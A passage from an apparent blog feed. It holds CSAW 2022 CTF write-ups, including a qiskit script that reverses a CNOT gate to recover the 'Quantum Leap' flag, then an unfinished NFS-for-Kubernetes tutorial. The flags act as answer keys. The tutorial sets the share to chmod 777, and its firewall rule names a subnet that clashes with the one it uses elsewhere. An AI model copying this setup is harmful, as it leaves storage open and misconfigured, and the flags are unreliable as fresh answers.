&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Run Reader&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@csaw2022:~$ python3 temp/solve.py&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;The_flag_is:1_Lik3_F0r3nS1c_4nd_y0u?&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;And Finally we got the flag!&lt;/p&gt;
&lt;h1 id=&#34;quantum-leap-misc&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#quantum-leap-misc&#34;&gt;#&lt;/a&gt; Quantum Leap : Misc&lt;/h1&gt;
&lt;details class=&#34;info&#34;&gt;&lt;summary&gt;Description&lt;/summary&gt;&lt;div&gt;
&lt;p&gt;My friend took the quantum leap and purchased a quantum computer with two qubits. They mentioned using a quantum logic gate to input the flag and they gave me the computers output. I have been stuck and Can NOT figure out the flag.&lt;/p&gt;
&lt;/div&gt;&lt;/details&gt;
&lt;p&gt;Challenge Link &amp;amp; WriteUp Author&lt;/p&gt;
&lt;div class=&#34;links&#34;&gt;&lt;div class=&#34;item&#34; title=&#34;Challenge Link&#34; style=&#34;--block-color:#2296fd;&#34;&gt;&lt;span class=&#34;exturl image&#34; data-url=&#34;aHR0cHM6Ly9naXRodWIuY29tL1JhbmlhTWlkYW91aS9DVEYtd3JpdGV1cHMvYmxvYi9tYWluL0NTQVcyMi9RdWFudHVtJTIwTGVhcC9vdXRwdXQudHh0&#34; data-background-image=&#34;https://ctftime.org/media/events/logo_48.png&#34;&gt;&lt;/span&gt;
          &lt;div class=&#34;info&#34;&gt;
          &lt;span class=&#34;exturl title&#34; data-url=&#34;aHR0cHM6Ly9naXRodWIuY29tL1JhbmlhTWlkYW91aS9DVEYtd3JpdGV1cHMvYmxvYi9tYWluL0NTQVcyMi9RdWFudHVtJTIwTGVhcC9vdXRwdXQudHh0&#34;&gt;Challenge Link&lt;/span&gt;
          &lt;p class=&#34;desc&#34;&gt;CSAW 2022 - Quantum Leap&lt;/p&gt;
          &lt;/div&gt;&lt;/div&gt;&lt;div class=&#34;item&#34; title=&#34;Writeup Author - Mida0ui&#34; style=&#34;--block-color:#de2336;&#34;&gt;&lt;span class=&#34;exturl image&#34; data-url=&#34;aHR0cHM6Ly93d3cubGlua2VkaW4uY29tL2luL3JhbmlhLW1pZGFvdWktYjAxNjNhMWJiLw==&#34; data-background-image=&#34;https://media-exp1.licdn.com/dms/image/C4D03AQHOP8zn9x9nKw/profile-displayphoto-shrink_800_800/0/1643659005590?e=1668643200&amp;v=beta&amp;t=FV5YWMygs2bbclfvgFIUtPgjIedq8tGiKWxopxK2_yU&#34;&gt;&lt;/span&gt;
          &lt;div class=&#34;info&#34;&gt;
          &lt;span class=&#34;exturl title&#34; data-url=&#34;aHR0cHM6Ly93d3cubGlua2VkaW4uY29tL2luL3JhbmlhLW1pZGFvdWktYjAxNjNhMWJiLw==&#34;&gt;Writeup Author - Mida0ui&lt;/span&gt;
          &lt;p class=&#34;desc&#34;&gt;Mida0ui Linkedin Profile&lt;/p&gt;
          &lt;/div&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;The description mentions that we’re dealing with a quantum computer with two qubits, se we can assume that the gate the person used to get the output is a two-qubit quantum logic gate.&lt;/p&gt;
&lt;p&gt;A quantum gate is basic quantum circuit operating on a small number of qubits, they perform operations to change the state of the qubits, and unlike many classical logic gates, quantum logic gates are reversible.&lt;br&gt;
Each quantum gate has its matrix, and since the qubit states are represented with vectors, the gates transform these vectors to get new states.&lt;br&gt;
The state vectors of the states |0&amp;gt; and |1&amp;gt; are:&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://user-images.githubusercontent.com/68945305/190504993-8094b514-dfa2-472f-8622-59867ef2e061.png&#34; alt=&#34;2022-09-15_19h32_37&#34;&gt;&lt;/p&gt;
&lt;p&gt;The CNOT gate was applied, it’s a two-qubit quantum gate that performs a controlled NOT where one qubit is the control and the second qubit is the target.&lt;br&gt;
Its matrix is the following :&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://user-images.githubusercontent.com/68945305/190486028-970479de-3ff1-415e-bdd2-b4f0e6c8dab2.png&#34; alt=&#34;2022-09-15_19h33_11&#34;&gt;&lt;/p&gt;
&lt;p&gt;When applied:&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://user-images.githubusercontent.com/68945305/190497970-bd14060b-e413-43b6-982a-17da2d1c18a5.png&#34; alt=&#34;2022-09-15_20h47_02&#34;&gt;&lt;/p&gt;
&lt;p&gt;The mathematics behind these results are simple:&lt;/p&gt;
&lt;p&gt;Lets take |10&amp;gt; and |11&amp;gt;:&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://user-images.githubusercontent.com/68945305/190505635-f998a0df-a328-4230-a3f1-1e3be73a5cef.png&#34; alt=&#34;2022-09-15_21h46_45&#34;&gt;&lt;/p&gt;
&lt;p&gt;This ⊗ represents a tensor product, you can read about it here if you don’t know what it is : &lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cHM6Ly93d3cubWF0aDNtYS5jb20vYmxvZy90aGUtdGVuc29yLXByb2R1Y3QtZGVteXN0aWZpZWQ=&#34;&gt;https://www.math3ma.com/blog/the-tensor-product-demystified&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;The first qubit is usually referred to as the control qubit and the second qubit as the target qubit. Expressed in basis states, the CNOT gate:&lt;br&gt;
leaves the control qubit unchanged and performs a Pauli-X gate or NOT gate (which just flips the state of the qubit) on the target qubit when the control qubit is in state ∣1⟩;&lt;br&gt;
leaves the target qubit unchanged when the control qubit is in state ∣0⟩.&lt;/p&gt;
&lt;p&gt;As you may have noticed, this challenge can be done manually by converting the output string to binary, taking two bits at a time and checking the value of the most significant bit, if it’s 1, the other bit is flipped, else, nothing is done.&lt;/p&gt;
&lt;p&gt;I wanted to solve this task with the CNOT gate itself,using the qiskit module in python.&lt;br&gt;
Qiskit is an open-source SDK for working with quantum computers at the level of pulses, circuits, and application modules.&lt;/p&gt;
&lt;p&gt;As mentioned before quantum logic gates are reversible, in this case, when CNOT gate is applied once on the output, we get the flag.&lt;/p&gt;
&lt;p&gt;Here’s the script, you can run it on jupyter notebook:&lt;/p&gt;
&lt;figure class=&#34;highlight py&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Solver&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;16&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;17&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;18&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;19&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;20&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;21&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;22&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;23&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;24&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;25&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;26&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;27&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;28&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;29&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;30&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;31&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;32&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;33&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;34&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;35&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;36&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;37&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;38&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;39&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;40&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;41&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;42&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;43&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;44&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;45&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;46&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;47&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;48&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;49&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;50&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;keyword&#34;&gt;from&lt;/span&gt; qiskit &lt;span class=&#34;keyword&#34;&gt;import&lt;/span&gt; *&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;output = &lt;span class=&#34;string&#34;&gt;&amp;#x27;wxqvn$Zae$&amp;#123;deyZv$d&amp;quot;i&amp;#x27;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;output_array = &lt;span class=&#34;string&#34;&gt;&amp;#x27;&amp;#x27;&lt;/span&gt;.join(&lt;span class=&#34;built_in&#34;&gt;format&lt;/span&gt;(i, &lt;span class=&#34;string&#34;&gt;&amp;#x27;08b&amp;#x27;&lt;/span&gt;) &lt;span class=&#34;keyword&#34;&gt;for&lt;/span&gt; i &lt;span class=&#34;keyword&#34;&gt;in&lt;/span&gt; &lt;span class=&#34;built_in&#34;&gt;bytearray&lt;/span&gt;(output, encoding =&lt;span class=&#34;string&#34;&gt;&amp;#x27;utf-8&amp;#x27;&lt;/span&gt;))&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;bin_flag = &lt;span class=&#34;string&#34;&gt;&amp;#x27;&amp;#x27;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;keyword&#34;&gt;def&lt;/span&gt; &lt;span class=&#34;title function_&#34;&gt;state_vect&lt;/span&gt;(&lt;span class=&#34;params&#34;&gt;bit&lt;/span&gt;):&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;keyword&#34;&gt;if&lt;/span&gt;(bit == &lt;span class=&#34;string&#34;&gt;&amp;#x27;0&amp;#x27;&lt;/span&gt;):&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        vect = [&lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;, &lt;span class=&#34;number&#34;&gt;0&lt;/span&gt;]&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;keyword&#34;&gt;else&lt;/span&gt; : &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        vect = [&lt;span class=&#34;number&#34;&gt;0&lt;/span&gt; ,&lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;]&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;keyword&#34;&gt;return&lt;/span&gt; vect&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;i = &lt;span class=&#34;number&#34;&gt;0&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;keyword&#34;&gt;while&lt;/span&gt; i&amp;lt;&lt;span class=&#34;built_in&#34;&gt;len&lt;/span&gt;(output_array):&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;comment&#34;&gt;#Initialize the quantum circuit&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    q = QuantumRegister(&lt;span class=&#34;number&#34;&gt;2&lt;/span&gt;, &lt;span class=&#34;string&#34;&gt;&amp;quot;q&amp;quot;&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    c = ClassicalRegister(&lt;span class=&#34;number&#34;&gt;2&lt;/span&gt;, &lt;span class=&#34;string&#34;&gt;&amp;quot;c&amp;quot;&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    qc = QuantumCircuit(q,c)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;comment&#34;&gt;#get the initial state from the output&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    vect0 = state_vect(output_array[i])&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    vect1 = state_vect(output_array[i+&lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;])&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;comment&#34;&gt;#initialize the register&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    qc.initialize(vect1,&lt;span class=&#34;number&#34;&gt;0&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    qc.initialize(vect0,&lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    qc.measure(q, c)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;comment&#34;&gt;#apply the CNOT gate, q[1] is the control and q[0] is the target&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    qc.cx(q[&lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;],q[&lt;span class=&#34;number&#34;&gt;0&lt;/span&gt;])&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    qc.measure(q, c)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;comment&#34;&gt;#execute the circuit&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    qobj = assemble(qc, shots=&lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    job = execute(qc,Aer.get_backend(&lt;span class=&#34;string&#34;&gt;&amp;#x27;qasm_simulator&amp;#x27;&lt;/span&gt;),shots=&lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    counts = job.result().get_counts()&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    bin_flag += &lt;span class=&#34;built_in&#34;&gt;str&lt;/span&gt;(counts)[&lt;span class=&#34;number&#34;&gt;2&lt;/span&gt;:&lt;span class=&#34;number&#34;&gt;4&lt;/span&gt;]&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;comment&#34;&gt;#Increment the counter to get the next 2 qubits&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    i=i+&lt;span class=&#34;number&#34;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;flag = &lt;span class=&#34;string&#34;&gt;&amp;#x27;&amp;#x27;&lt;/span&gt;.join(&lt;span class=&#34;built_in&#34;&gt;chr&lt;/span&gt;(&lt;span class=&#34;built_in&#34;&gt;int&lt;/span&gt;(bin_flag[i*&lt;span class=&#34;number&#34;&gt;8&lt;/span&gt;:i*&lt;span class=&#34;number&#34;&gt;8&lt;/span&gt;+&lt;span class=&#34;number&#34;&gt;8&lt;/span&gt;],&lt;span class=&#34;number&#34;&gt;2&lt;/span&gt;)) &lt;span class=&#34;keyword&#34;&gt;for&lt;/span&gt; i &lt;span class=&#34;keyword&#34;&gt;in&lt;/span&gt; &lt;span class=&#34;built_in&#34;&gt;range&lt;/span&gt;(&lt;span class=&#34;built_in&#34;&gt;len&lt;/span&gt;(bin_flag)//&lt;span class=&#34;number&#34;&gt;8&lt;/span&gt;))&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;built_in&#34;&gt;print&lt;/span&gt;(flag)&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;The flag is  &lt;code&gt;flag&amp;#123;4_qu4ntum_g4t3&amp;#125;&lt;/code&gt;&lt;/p&gt;
</content>
        <updated>2022-09-12T10:33:37.000Z</updated>
    </entry>
    <entry>
        <id>http://example.com/2022/09/10/Kubernetes/nfs-k8s/</id>
        <title>NFS as Remote Storage for Kubernetes</title>
        <link rel="alternate" href="http://example.com/2022/09/10/Kubernetes/nfs-k8s/"/>
        <content type="html">&lt;p&gt;We will setting up a NFS server to use it as remote storage for our cluster to create a lot of persistent volumes in our local infrastructure !&lt;/p&gt;
&lt;p&gt;We Assume that we have 4 Ubuntu 20.04 LTS, The Kubernetes is installed and the  &lt;code&gt;4n6nk8s-nfs&lt;/code&gt;  host in the same network with the cluster :&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Role&lt;/th&gt;
&lt;th&gt;Hostname&lt;/th&gt;
&lt;th&gt;IP address&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Master&lt;/td&gt;
&lt;td&gt;4n6nk8s-master&lt;/td&gt;
&lt;td&gt;192.168.1.18/24&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Worker&lt;/td&gt;
&lt;td&gt;4n6nk8s-worker1&lt;/td&gt;
&lt;td&gt;192.168.1.19/24&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Worker&lt;/td&gt;
&lt;td&gt;4n6nk8s-worker2&lt;/td&gt;
&lt;td&gt;192.168.1.20/24&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;NFS Server&lt;/td&gt;
&lt;td&gt;4n6nk8s-nfs&lt;/td&gt;
&lt;td&gt;192.168.1.80/24&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;what-is-a-nfs-network-file-system-server&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#what-is-a-nfs-network-file-system-server&#34;&gt;#&lt;/a&gt; What is a NFS (Network File System) Server:&lt;/h2&gt;
&lt;p&gt;Network File System (NFS) is a networking protocol for distributed file sharing. A file system defines the way data in the form of files is stored and retrieved from storage devices, such as hard disk drives, solid-state drives and tape drives. NFS is a network file sharing protocol that defines the way files are stored and retrieved from storage devices across networks.&lt;/p&gt;
&lt;p&gt;This distributed file system protocol allows a user on a client computer to access files over a network in the same way they would access a local storage file.&lt;/p&gt;
&lt;h2 id=&#34;setting-up-the-nfs-server&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#setting-up-the-nfs-server&#34;&gt;#&lt;/a&gt; Setting up the NFS server&lt;/h2&gt;
&lt;p&gt;We need to install the  &lt;code&gt;nfs-kernel-server&lt;/code&gt;  package on the NFS server. This package will store additional packages such as  &lt;code&gt;nfs-common&lt;/code&gt;  and  &lt;code&gt;4n6nk8s@rpcbind&lt;/code&gt;&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Command Line Prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s-nfs:~$ sudo apt install nfs-kernel-server&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Now let’s create an NFS Export Directory&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Command Line Prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-nfs:~$ sudo &lt;span class=&#34;built_in&#34;&gt;mkdir&lt;/span&gt; /mnt/nfs-data &lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Now let’s give it a read,write and execute privileges to all the contents inside the directory&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Command Line Prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-nfs:~$ sudo &lt;span class=&#34;built_in&#34;&gt;chmod&lt;/span&gt; 777 /mnt/nfs-data&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Now Lets add a new line to the  &lt;code&gt;/etc/exports&lt;/code&gt;  configuration file.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The  &lt;code&gt;/etc/exports&lt;/code&gt;  file indicates all directories that a nfs server exports to its clients. Each line in the file specifies a single directory.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Command Line Prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-nfs:~$ sudo vim /etc/exports&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;You can provide access to a single client, multiple clients, or specify an entire subnet. In this guide, we have allowed an entire subnet to have access to the NFS share.&lt;/p&gt;
&lt;figure class=&#34;highlight vim&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;/mnt/nfs-data &lt;span class=&#34;number&#34;&gt;192.168&lt;/span&gt;.&lt;span class=&#34;number&#34;&gt;1.0&lt;/span&gt;/&lt;span class=&#34;number&#34;&gt;24&lt;/span&gt;(rw,&lt;span class=&#34;keyword&#34;&gt;sync&lt;/span&gt;,no_subtree_check)&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;After granting access to the subnet, let’s export the NFS share directory and restart the NFS&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Command Line Prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-nfs:~$ sudo exportfs -a&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-nfs:~$ sudo systemctl restart nfs-kernel-server&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Let’s allow NFS access through the firewall&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Command Line Prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-nfs:~$ sudo ufw allow from 192.168.43.0/24 to any port nfs&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;h2 id=&#34;install-the-nfs-client-on-the-kubernetes-nodes&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#install-the-nfs-client-on-the-kubernetes-nodes&#34;&gt;#&lt;/a&gt; Install the NFS Client on the Kubernetes Nodes&lt;/h2&gt;
